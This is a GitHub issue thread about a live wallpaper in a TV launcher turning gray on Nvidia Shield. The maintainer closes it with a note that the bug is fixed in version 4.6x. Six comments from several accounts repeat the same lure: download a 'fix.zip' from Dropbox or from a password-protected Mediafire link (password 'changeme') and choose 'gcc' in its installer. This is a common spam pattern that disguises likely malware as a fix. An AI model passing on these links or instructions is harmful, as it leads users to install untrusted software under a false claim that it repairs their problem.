### ISSUE TITLE
Live wallpaper not working Good (gray screen) Nvidia Shield 

### ISSUE THREAD

**Issue by KaBoS-Tm** [spocky/miproja1#151]
Hello, Live wallpaper not working Good (gray screen) Nvidia Shield 

After selecting the live wallpaper everything looks good and it appears and works fine after a few minutes it disappears and a gray background appears Only in NVIDIA Shield 

Same problem with many here details 
https://www.reddit.com/r/Projectivy_Launcher/s/izdNpsMF7f

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Blockr22** [comment]
Yes, i m waiting for new update myself to fix some issues with live wallpapers. Other than that i luv this launcher. Hope to see new updates with some needed fixes. Thnx

**Comment by spocky** [comment]
Fixed in 4.6x
